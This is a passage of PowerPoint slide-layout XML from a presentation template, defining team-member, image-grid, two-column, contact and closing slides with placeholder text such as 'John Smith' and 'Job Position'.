                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D139A6F-BFBB-DCEF-9172-43CCEC62AA89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="14579424" y="7001300"/>
            <a:ext cx="3708576" cy="32856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20059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20059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226133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226133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55FF0BB-FEF2-7845-AEA2-C7C67F472F8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350296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B4AA2CD4-91AE-15D4-5047-D058C7A5156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636668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F977CC7-D310-08FD-4968-35876E337A0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856368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42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Images Circle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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C982FBE3-24DA-EF3E-4046-AB99AEFFA9BC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Freeform: Shape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D139A6F-BFBB-DCEF-9172-43CCEC62AA89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="14579424" y="7001300"/>
            <a:ext cx="3708576" cy="32856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20059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20059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226133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226133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55FF0BB-FEF2-7845-AEA2-C7C67F472F8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350296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B4AA2CD4-91AE-15D4-5047-D058C7A5156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636668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F977CC7-D310-08FD-4968-35876E337A0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856368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652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Images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7FBCF3B-DC0C-B94A-05F4-DC0C79A28B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BCAD57E3-99FC-CFD5-1427-ECE47B34C9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CD1C6C9-FB60-50E2-3612-8009F9D9D34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2B5D4F1-2B80-DE54-1383-35773E0A8C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E45A7BF-3955-CB0D-9514-92CB5A39CA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2C696C4-3914-DF71-3EF4-CFFA37D99B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C4BE47FF-1E04-6D4F-5226-5B0065C0E54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C9D0B029-760D-7768-CBEB-1658F1C2F5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134AB4B-C19B-E6ED-508C-F93E79643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5B2879CF-7A50-EF39-8CB5-0DC37D20B80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72584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F6B8451A-C2D0-7BFF-0656-5531C8934D7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06660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E864AAAB-1F13-C6B3-F547-AA2E975B2C2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40736" y="319467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84E51C0D-9943-3431-31D3-EC624450C4F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4274812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5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Images Circle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7FBCF3B-DC0C-B94A-05F4-DC0C79A28B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BCAD57E3-99FC-CFD5-1427-ECE47B34C9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CD1C6C9-FB60-50E2-3612-8009F9D9D34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2B5D4F1-2B80-DE54-1383-35773E0A8C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E45A7BF-3955-CB0D-9514-92CB5A39CA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2C696C4-3914-DF71-3EF4-CFFA37D99B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C4BE47FF-1E04-6D4F-5226-5B0065C0E54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C9D0B029-760D-7768-CBEB-1658F1C2F5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134AB4B-C19B-E6ED-508C-F93E79643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5B2879CF-7A50-EF39-8CB5-0DC37D20B80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72584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F6B8451A-C2D0-7BFF-0656-5531C8934D7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06660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E864AAAB-1F13-C6B3-F547-AA2E975B2C2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40736" y="319467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84E51C0D-9943-3431-31D3-EC624450C4F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4274812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11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ADA6AD44-9C0B-77DB-5118-5247E47118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70530" y="6296025"/>
            <a:ext cx="2973070" cy="657223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b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John Smith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498D56B-8EB3-7F7F-2CEF-E3634B8569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52766" y="2482903"/>
            <a:ext cx="3568595" cy="3568595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E25AB9-294A-CD6A-3474-249EEB6842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1165" y="70751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424D56"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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A7326AE-E5AC-F8C1-8C35-1E21CD259C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71165" y="75420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rgbClr val="424D56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BBF84D8-507C-A802-E83A-B649196E8972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7677466" y="6296025"/>
            <a:ext cx="2973070" cy="657223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr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John Smith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0319E42-C729-4CEB-F028-0D7DC7032F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59702" y="2482903"/>
            <a:ext cx="3568595" cy="3568595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730FF9F-A587-D4B1-4EA3-1E05E3BAD5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78101" y="70751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424D56"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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F7ED0AE0-BD98-2806-3EA9-57DD282267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78101" y="75420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rgbClr val="424D56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CF35625-C9EA-1E30-153F-C68A12B50F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12384403" y="6296025"/>
            <a:ext cx="2973070" cy="657223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr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John Smith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0EA49B31-B04C-AE21-16AD-EE0C61012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066639" y="2482903"/>
            <a:ext cx="3568595" cy="3568595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6C7B98D6-B1EE-1642-3E37-0A80314352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385038" y="70751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424D56"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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4E874517-08B6-7424-7B50-FA4C4FD730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85038" y="75420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rgbClr val="424D56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Contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="872974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Images Squares turq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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46558413-0BDB-B020-371B-65AE3305019C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Freeform: Shape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69C67296-386F-80A2-2FAC-1E1F9951D79F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="14579424" y="7001300"/>
            <a:ext cx="3708576" cy="32856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20059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20059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226133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226133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55FF0BB-FEF2-7845-AEA2-C7C67F472F8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350296" y="3055101"/>
            <a:ext cx="3014663" cy="30146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B4AA2CD4-91AE-15D4-5047-D058C7A5156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636668" y="3055101"/>
            <a:ext cx="3014663" cy="30146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F977CC7-D310-08FD-4968-35876E337A0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856368" y="3055101"/>
            <a:ext cx="3014663" cy="30146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7204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Images Squares turq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7FBCF3B-DC0C-B94A-05F4-DC0C79A28B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BCAD57E3-99FC-CFD5-1427-ECE47B34C9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0377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CD1C6C9-FB60-50E2-3612-8009F9D9D34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2B5D4F1-2B80-DE54-1383-35773E0A8C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760377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E45A7BF-3955-CB0D-9514-92CB5A39CA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2C696C4-3914-DF71-3EF4-CFFA37D99B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760377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C4BE47FF-1E04-6D4F-5226-5B0065C0E54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C9D0B029-760D-7768-CBEB-1658F1C2F5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760377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134AB4B-C19B-E6ED-508C-F93E79643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5B2879CF-7A50-EF39-8CB5-0DC37D20B80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72584" y="3192131"/>
            <a:ext cx="2740603" cy="2740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F6B8451A-C2D0-7BFF-0656-5531C8934D7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06660" y="3192131"/>
            <a:ext cx="2740603" cy="2740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E864AAAB-1F13-C6B3-F547-AA2E975B2C2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40736" y="3194671"/>
            <a:ext cx="2740603" cy="2740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84E51C0D-9943-3431-31D3-EC624450C4F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4274812" y="3192131"/>
            <a:ext cx="2740603" cy="2740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2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Images Circles turq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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96898DD8-FC9E-EC8D-3714-DAE00678AB7D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Freeform: Shape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78DD43C7-C42A-C28B-5EB9-A175D41B25F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="14579424" y="7001300"/>
            <a:ext cx="3708576" cy="32856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20059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20059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226133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226133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55FF0BB-FEF2-7845-AEA2-C7C67F472F8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350296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B4AA2CD4-91AE-15D4-5047-D058C7A5156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636668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F977CC7-D310-08FD-4968-35876E337A0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856368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760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Images Circles turq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7FBCF3B-DC0C-B94A-05F4-DC0C79A28B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BCAD57E3-99FC-CFD5-1427-ECE47B34C9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0377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CD1C6C9-FB60-50E2-3612-8009F9D9D34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2B5D4F1-2B80-DE54-1383-35773E0A8C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760377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E45A7BF-3955-CB0D-9514-92CB5A39CA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2C696C4-3914-DF71-3EF4-CFFA37D99B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760377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C4BE47FF-1E04-6D4F-5226-5B0065C0E54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C9D0B029-760D-7768-CBEB-1658F1C2F5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760377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134AB4B-C19B-E6ED-508C-F93E79643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5B2879CF-7A50-EF39-8CB5-0DC37D20B80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72584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F6B8451A-C2D0-7BFF-0656-5531C8934D7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06660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E864AAAB-1F13-C6B3-F547-AA2E975B2C2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40736" y="319467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84E51C0D-9943-3431-31D3-EC624450C4F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4274812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862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 - text and imag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8DF5C-8DB6-19D9-735A-0616BAD649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76300"/>
            <a:ext cx="8267700" cy="16605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2 Column Layout Text and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8FE30D-144C-B987-1C5A-C1E9CDA95C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6300" y="3057525"/>
            <a:ext cx="8267700" cy="63531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200"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/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B5BF07-9DE2-B4EF-CD9F-C8B683E0A6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826625" y="0"/>
            <a:ext cx="8461375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0793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 - text and image - left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8DF5C-8DB6-19D9-735A-0616BAD649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76300"/>
            <a:ext cx="8267700" cy="16605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2 Column Layout Text and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8FE30D-144C-B987-1C5A-C1E9CDA95C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6300" y="3057525"/>
            <a:ext cx="8267700" cy="63531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200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/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B5BF07-9DE2-B4EF-CD9F-C8B683E0A6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826625" y="0"/>
            <a:ext cx="8461375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36206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 - text and imag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8DF5C-8DB6-19D9-735A-0616BAD649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0" y="876300"/>
            <a:ext cx="8267700" cy="16605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2 Column Layout Text and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8FE30D-144C-B987-1C5A-C1E9CDA95C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4000" y="3057525"/>
            <a:ext cx="8267700" cy="63531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200"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/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B5BF07-9DE2-B4EF-CD9F-C8B683E0A6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8461375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97876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 - text and image - right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8DF5C-8DB6-19D9-735A-0616BAD649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0" y="876300"/>
            <a:ext cx="8267700" cy="16605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2 Column Layout Text and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8FE30D-144C-B987-1C5A-C1E9CDA95C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4000" y="3057525"/>
            <a:ext cx="8267700" cy="63531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200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/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B5BF07-9DE2-B4EF-CD9F-C8B683E0A6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8461375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9074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8DF5C-8DB6-19D9-735A-0616BAD649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3200400"/>
            <a:ext cx="7448550" cy="1660525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr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8FE30D-144C-B987-1C5A-C1E9CDA95C1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76300" y="5381625"/>
            <a:ext cx="7448550" cy="13430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4000">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl5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B5BF07-9DE2-B4EF-CD9F-C8B683E0A6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44000" y="892674"/>
            <a:ext cx="7692159" cy="85016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88389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8DF5C-8DB6-19D9-735A-0616BAD649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3200400"/>
            <a:ext cx="7448550" cy="1660525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr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8FE30D-144C-B987-1C5A-C1E9CDA95C1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76300" y="5381625"/>
            <a:ext cx="7448550" cy="13430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4000">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl5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B5BF07-9DE2-B4EF-CD9F-C8B683E0A6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44000" y="892674"/>
            <a:ext cx="3657600" cy="3657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DE93B09-710F-7596-025E-80F56EFB91E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754100" y="876300"/>
            <a:ext cx="3657600" cy="3657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4ED45DDB-7B6A-1EE7-C000-E6F270EA8AB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0" y="5753100"/>
            <a:ext cx="3657600" cy="3657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B75E7F4-57A0-F395-74A6-C6DA12CDAAF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754100" y="5736726"/>
            <a:ext cx="3657600" cy="3657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366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ADA6AD44-9C0B-77DB-5118-5247E47118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70530" y="6296025"/>
            <a:ext cx="2973070" cy="657223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b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John Smith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498D56B-8EB3-7F7F-2CEF-E3634B8569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52766" y="2482903"/>
            <a:ext cx="3568595" cy="3568595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E25AB9-294A-CD6A-3474-249EEB6842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1165" y="70751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949CA1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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A7326AE-E5AC-F8C1-8C35-1E21CD259C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71165" y="7562852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rgbClr val="949CA1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BBF84D8-507C-A802-E83A-B649196E8972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7677466" y="6296025"/>
            <a:ext cx="2973070" cy="657223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr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John Smith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0319E42-C729-4CEB-F028-0D7DC7032F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59702" y="2482903"/>
            <a:ext cx="3568595" cy="3568595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730FF9F-A587-D4B1-4EA3-1E05E3BAD5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78101" y="70751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949CA1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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F7ED0AE0-BD98-2806-3EA9-57DD282267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78101" y="7562852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rgbClr val="949CA1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CF35625-C9EA-1E30-153F-C68A12B50F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12384403" y="6296025"/>
            <a:ext cx="2973070" cy="657223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr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John Smith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0EA49B31-B04C-AE21-16AD-EE0C61012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066639" y="2482903"/>
            <a:ext cx="3568595" cy="3568595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6C7B98D6-B1EE-1642-3E37-0A80314352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385038" y="70751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949CA1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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4E874517-08B6-7424-7B50-FA4C4FD730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85038" y="7562852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rgbClr val="949CA1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Contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1017007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C98CFC68-C48A-C23C-3C66-19F8FA56C9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3807975"/>
            <a:ext cx="16535400" cy="2974109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="80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Questions?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DAE9EB9-FB3B-0746-436D-607AB7A2FC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855871" y="7629759"/>
            <a:ext cx="2576259" cy="143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844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C98CFC68-C48A-C23C-3C66-19F8FA56C9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3807975"/>
            <a:ext cx="16535400" cy="2974109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="80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267075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8CFC68-C48A-C23C-3C66-19F8FA56C9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28959" y="3586911"/>
            <a:ext cx="7715041" cy="2974109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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Thank you!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873E030-5936-7219-10DF-C83EB9EE68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5763" y="3324713"/>
            <a:ext cx="4341668" cy="76183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40302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C13D7C94-843A-3B46-026C-EE7FF3D189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920729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Simple slide content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DAE9EB9-FB3B-0746-436D-607AB7A2FC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855871" y="7974636"/>
            <a:ext cx="2576259" cy="1431255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E5BE0C-DD41-FB4D-DA97-C3D1AEEDF3E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010409" y="2863516"/>
            <a:ext cx="10267183" cy="36215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6858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2pPr>
            <a:lvl3pPr marL="13716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3pPr>
            <a:lvl4pPr marL="20574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4pPr>
            <a:lvl5pPr marL="27432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8760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 with logo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C13D7C94-843A-3B46-026C-EE7FF3D189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920729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Simple slide content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DAE9EB9-FB3B-0746-436D-607AB7A2FC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855871" y="7974636"/>
            <a:ext cx="2576259" cy="1431255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E5BE0C-DD41-FB4D-DA97-C3D1AEEDF3E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010409" y="2863516"/>
            <a:ext cx="10267183" cy="36215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6858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2pPr>
            <a:lvl3pPr marL="13716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3pPr>
            <a:lvl4pPr marL="20574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4pPr>
            <a:lvl5pPr marL="27432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7914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920729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Simple slide content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E5BE0C-DD41-FB4D-DA97-C3D1AEEDF3E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010409" y="2863516"/>
            <a:ext cx="10267183" cy="547692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6858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2pPr>
            <a:lvl3pPr marL="13716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3pPr>
            <a:lvl4pPr marL="20574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4pPr>
            <a:lvl5pPr marL="27432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3C04D7C7-9C5A-0FC6-DC91-3BA02252F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56848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64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920729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Simple slide content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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3C04D7C7-9C5A-0FC6-DC91-3BA02252F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E5BE0C-DD41-FB4D-DA97-C3D1AEEDF3E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010409" y="2863516"/>
            <a:ext cx="10267183" cy="547692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6858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2pPr>
            <a:lvl3pPr marL="13716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3pPr>
            <a:lvl4pPr marL="20574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4pPr>
            <a:lvl5pPr marL="27432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7864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64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AF9B2761-4C48-23D8-0538-F012E2CAD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4427872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en-US"/>
              <a:t>One liner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42223385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r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AF9B2761-4C48-23D8-0538-F012E2CAD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4427872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en-US"/>
              <a:t>One liner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239985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aphic 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA8A69C-8E3E-5E14-F457-35A403742C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13981136" y="7603641"/>
            <a:ext cx="4306864" cy="3552069"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3973996"/>
              <a:gd name="connsiteY0" fmla="*/ 3277537 h 3277537"/>
              <a:gd name="connsiteX1" fmla="*/ 3973997 w 3973996"/>
              <a:gd name="connsiteY1" fmla="*/ 3277537 h 3277537"/>
              <a:gd name="connsiteX2" fmla="*/ 3973997 w 3973996"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 3277537"/>
              <a:gd name="connsiteX3" fmla="*/ 1848144 w 3973996"/>
              <a:gd name="connsiteY3" fmla="*/ 1227313 h 3277537"/>
              <a:gd name="connsiteX4" fmla="*/ 1588675 w 3973996"/>
              <a:gd name="connsiteY4" fmla="*/ 1377110 h 3277537"/>
              <a:gd name="connsiteX5" fmla="*/ 13375 w 3973996"/>
              <a:gd name="connsiteY5" fmla="*/ 3224281 h 3277537"/>
              <a:gd name="connsiteX6" fmla="*/ 13132 w 3973996"/>
              <a:gd name="connsiteY6" fmla="*/ 3225254 h 3277537"/>
              <a:gd name="connsiteX7" fmla="*/ 13132 w 3973996"/>
              <a:gd name="connsiteY7" fmla="*/ 3225254 h 3277537"/>
              <a:gd name="connsiteX8" fmla="*/ 12888 w 3973996"/>
              <a:gd name="connsiteY8" fmla="*/ 3226227 h 3277537"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 3973996"/>
              <a:gd name="connsiteY9" fmla="*/ 3277537 h 32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73996" h="3277537">
                <a:moveTo>
                  <a:pt x="0" y="3277537"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3973997" y="3277537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3973997" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1848144" y="1227313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1588675" y="1377110"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="952281" y="1755737"/>
                  <a:pt x="269197" y="2269569"/>
                  <a:pt x="13375" y="3224281"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13375" y="3224525"/>
                  <a:pt x="13375" y="3225011"/>
                  <a:pt x="13132" y="3225254"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13132" y="3225254"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13132" y="3225254"/>
                  <a:pt x="13132" y="3225984"/>
                  <a:pt x="12888" y="3226227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8268" y="3243493"/>
                  <a:pt x="4377" y="3260515"/>
                  <a:pt x="0" y="3277537"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="87CFD3"/>
          </a:solidFill>
          <a:ln w="2052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2880" tIns="182880" rIns="182880" bIns="18288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876300"/>
            <a:ext cx="16535400" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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  <a:br>
              <a:rPr lang="en-US"/>
            </a:b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D9EDF35-5E2D-F730-672F-A0304BDF47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76300" y="2009776"/>
            <a:ext cx="5374958" cy="6991350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24D5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0FC6BA4-F2FE-10F8-1E56-608C50CFCABA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456520" y="2009776"/>
            <a:ext cx="5374958" cy="6991350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24D5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6AF3544-FEF4-D0DE-603E-CBB69039779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036740" y="2009776"/>
            <a:ext cx="5374958" cy="6991350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24D5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B7B62AA-2FA7-BF6A-48B8-CCCF96A95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07045" y="9379676"/>
            <a:ext cx="2279055" cy="45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395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-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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04CDD9CF-99EA-93F8-0488-62825A416283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3793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53793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2399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92399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6" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63684CCA-0B09-1D6C-49CA-47679739B95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890734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7" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC6EE22C-AD67-9662-BC20-E716D60E94D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115300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763FF8ED-FC0A-7A72-712A-C572551F7C3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301268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9253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vy text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aphic 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA8A69C-8E3E-5E14-F457-35A403742C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
